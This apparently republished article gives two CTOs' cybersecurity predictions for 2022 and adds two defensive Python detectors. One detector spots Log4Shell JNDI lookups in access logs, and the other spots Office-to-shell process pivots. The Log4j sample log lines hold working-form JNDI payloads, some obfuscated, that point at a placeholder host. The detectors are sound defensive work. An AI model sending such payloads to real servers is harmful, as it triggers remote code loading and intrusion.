Cybersecurity is a fast-paced field. Several high-profile ransomware attacks affecting global supply chains occurred in 2021, including assaults on Colonial Pipeline and JBS.
The year 2021 closed with the discovery of numerous serious Log4j flaws, whose consequences will most likely carry over into 2022.
Matthew Warner, Blumira’s CTO and Co-Founder, and Aviv Grafi, Votiro’s CTO and Co-Founder, shared their cybersecurity predictions for 2022.
Prediction #1: Log4j will be weaponized
Unfortunately, threat actors took advantage of the Log4j vulnerabilities (also known as Log4Shell) revealed in December. Only a week after the initial vulnerability was found, Conti had constructed a comprehensive attack chain employing Log4j as an access point.
Log4j is a low-hanging fruit for opportunistic ransomware gangs looking to get access to an environment rapidly and solely for financial benefit.
“We’ll see ransomware operators use [Log4j] to see what they can grab,” said Matt Warner, Blumira’s CTO and Co-Founder.
“Advanced ransomware operators use it in some very clever ways to penetrate new environments.”
According to Aviv Grafi, CTO and Co-Founder of Votiro, “Log4Shell is not only one of the easiest remote code execution (RCE) vulnerabilities we’ve seen in the last several years.”
Because Log4j is such a widely used logging library, it’s intrinsically challenging for IT administrators to verify that their business is patched and secured.
As a result, detection is the best strategy to protect yourself from Log4j-related threats.
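Since the article recommends detection as the practical fallback when you cannot be sure every Log4j instance is patched, the following added example (not from the article or from Blumira or Votiro) shows what such a check looks like against web-server logs. The log lines are constructed, and the obfuscation handling is a simplified version of the normalization that published detection rules perform: it collapses the `${lower:...}`, `${upper:...}` and `${...:-x}` lookups that are used to split the literal word "jndi" before looking for a JNDI lookup with a network protocol. Matching request logs like this tells you that someone tried; it does not tell you whether the attempt succeeded, so it complements patching and egress monitoring rather than replacing them.

```python
"""Added example: flag Log4Shell-style JNDI lookup strings in access-log lines.

Constructed sample data; the regexes are a simplified version of public detection rules.
"""
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not real traffic). Lines 2-4 carry lookups in
# the User-Agent or query string; lines 1 and 5 are benign (line 5 has a harmless lookup).
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.7 - - [10/Dec/2021:10:01:04 +0000] "GET /?x=${${lower:j}ndi:rmi://example.invalid/b} HTTP/1.1" 400 0 "-" "curl/7.68"',
    '203.0.113.8 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://example.invalid/c}"',
    '203.0.113.9 - - [10/Dec/2021:10:01:06 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

# Innermost lookups used to hide the literal word "jndi":
#   ${lower:J} -> "j", ${upper:j} -> "J", ${anything:-j} and ${::-j} -> default value "j"
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")

# A JNDI lookup naming one of the protocols the lookup can resolve through.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds|http)\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested case/default lookups from the inside out until the text is stable."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookup(line: str) -> Optional[str]:
    """Return the protocol of a JNDI lookup found in the normalized line, or None."""
    match = _JNDI.search(normalize_lookups(line))
    return match.group(1).lower() if match else None


def scan_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Scan log lines and return one record per line that carries a JNDI lookup."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        protocol = find_jndi_lookup(line)
        if protocol:
            hits.append({"line_no": line_no, "protocol": protocol})
    return hits


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: JNDI lookup via {hit['protocol']}")
```

Run against the constructed sample, lines 2, 3 and 4 are reported (ldap, rmi and dns); the benign `${date:yyyy}` lookup on line 5 is not, because it names no JNDI protocol.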
Prediction #2: Malware loaders and injection techniques will advance
Malware loaders are malicious programs that download the files of a further executable payload onto a computer and launch it.
SquirrelWaffle, a loader that downloads malware like Qakbot or the pentesting tool Cobalt Strike, first appeared in the wild in late 2021.
SquirrelWaffle campaigns primarily rely on emails containing malicious hyperlinks or attachments that, when opened, execute obfuscated malware-retrieving code.
Understanding the cyber kill chain and having the tools to detect behaviors linked with each stage are two pieces of advice that rarely change when it comes to preventing ransomware.
Endpoint detection and response (EDR) and multi-factor authentication are crucial security foundations to implement.
Monitoring behaviors linked with new malware and ransomware campaigns, for example process pivoting within Windows environments, should be a top priority for security and IT professionals.
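The process pivoting mentioned above is what a malicious attachment of the kind SquirrelWaffle campaigns use looks like from the endpoint: a document-handling application spawns a command shell or script host, which then pulls down the next stage. The added example below (not from the article or from any vendor named in it) shows the detection logic over constructed Sysmon Event ID 1-style process-creation records. The field names (`guid`, `parent_guid`, `image`) and the two application lists are assumptions chosen for illustration; the point is that the check walks the ancestry chain rather than looking only at the immediate parent, so a `winword.exe -> cmd.exe -> powershell.exe` pivot is caught even though PowerShell's direct parent is an ordinary shell.

```python
"""Added example: flag script/shell hosts descended from a document-handling application.

Constructed process-creation events modelled loosely on Sysmon Event ID 1; not real telemetry.
"""
from typing import Dict, List

# Illustrative lists (assumptions, not an exhaustive catalogue).
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_AND_SHELL_HOSTS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe",
}

# Constructed events. Chain A is a document-launched pivot (explorer -> WINWORD -> cmd -> powershell);
# chain B is an administrator's ordinary shell (explorer -> cmd -> powershell).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"guid": "A1", "parent_guid": "00", "image": r"C:\Windows\explorer.exe"},
    {"guid": "A2", "parent_guid": "A1", "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"guid": "A3", "parent_guid": "A2", "image": r"C:\Windows\System32\cmd.exe"},
    {"guid": "A4", "parent_guid": "A3", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"guid": "B1", "parent_guid": "A1", "image": r"C:\Windows\System32\cmd.exe"},
    {"guid": "B2", "parent_guid": "B1", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]


def basename(image_path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return image_path.rsplit("\\", 1)[-1].lower()


def build_index(events: List[Dict[str, str]]) -> Dict[str, Dict[str, str]]:
    """Index events by process GUID so parents can be looked up in O(1)."""
    return {e["guid"]: e for e in events}


def ancestry(event: Dict[str, str], index: Dict[str, Dict[str, str]], max_depth: int = 10) -> List[str]:
    """Image basenames of the process's ancestors, nearest parent first."""
    chain: List[str] = []
    current = index.get(event["parent_guid"])
    while current is not None and len(chain) < max_depth:
        chain.append(basename(current["image"]))
        current = index.get(current["parent_guid"])
    return chain


def detect_pivots(events: List[Dict[str, str]], max_hops: int = 3) -> List[Dict[str, object]]:
    """Alert on script/shell hosts with a document application within max_hops ancestors."""
    index = build_index(events)
    alerts: List[Dict[str, object]] = []
    for event in events:
        child = basename(event["image"])
        if child not in SCRIPT_AND_SHELL_HOSTS:
            continue
        ancestors = ancestry(event, index)
        for hops, ancestor in enumerate(ancestors[:max_hops], 1):
            if ancestor in DOCUMENT_APPS:
                alerts.append({
                    "guid": event["guid"],
                    "child": child,
                    "origin": ancestor,
                    "hops": hops,
                    "chain": [child] + ancestors[:hops],
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_pivots(SAMPLE_EVENTS):
        print(f"{alert['guid']}: {' <- '.join(alert['chain'])} ({alert['hops']} hop(s) from {alert['origin']})")
```

On the constructed sample, chain A produces two alerts (cmd.exe one hop from WINWORD, powershell.exe two hops), and chain B produces none, which is the distinction between a user who opened a poisoned document and an administrator who opened a terminal.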
Prediction #3: Malware campaigns will become political
Because 2022 is a midterm election year in the United States, we should expect phishing operations containing political propaganda.
“We’ve seen a lot of rise in ransomware assaults around propaganda, and Covid contributed to that,” Warner added.
“Because propaganda creates a narrative, it makes phishing easier for attackers.”
“It’s still a flywheel for attackers to build up that logic and say, ‘This is how we can attack individuals with phishing.’”
In 2022, phishing attacks will almost certainly include political rhetoric, such as an email with the subject line “5 things you haven’t heard about your favorite candidate” that urges victims to open dangerous links or attachments.
Prediction #4: Data will be the end game for ransomware operators
Attribution and extortion were less of a worry twenty years ago because there was no infrastructure for sharing or selling stolen data like there is today.
Ransomware is now primarily concerned with blackmailing victims, obtaining data, and doing more with that data.
“What we’ve learned over the previous 20 years is that that data has value, which attackers will exploit,” Warner said.
Small municipalities, local governments, and schools are typically the unwitting victims of the bystander effect, as they hold important data that ransomware operators want.
In 2022, cybercriminals will continue to attack these industries.
“Securing environments against these threats necessitates broad visibility and risk mitigation activities that are tough for enterprises of all sizes to keep up with, particularly those with lower budgets and IT teams,” Warner added.
In 2022, ransomware operators will continue to use double extortion, in which they encrypt all data and threaten to disclose it in order to force businesses to pay the ransom.
The inevitable progression is from holding data for ransom to blackmailing victims with the exposure of that data.
Prediction #5: Vulnerabilities in legacy code will keep coming
According to the US-CERT Vulnerability Database, 2021 recorded more vulnerabilities than any previous year.
Critical vulnerabilities arose during the year, ranging from several Log4j flaws to HiveNightmare and PrintNightmare.
Unfortunately, that trend is likely to continue, due to an increased focus on cybersecurity research and the inevitability of additional defects as more software is written.
However, the majority of vulnerabilities will most certainly be in legacy code, owing to the absence of safe coding technologies and processes available to developers twenty or thirty years ago.
“Every year, we talk about how that might be the last holy grail vulnerability,” Grafi added. “And we’re always surprised to see more.”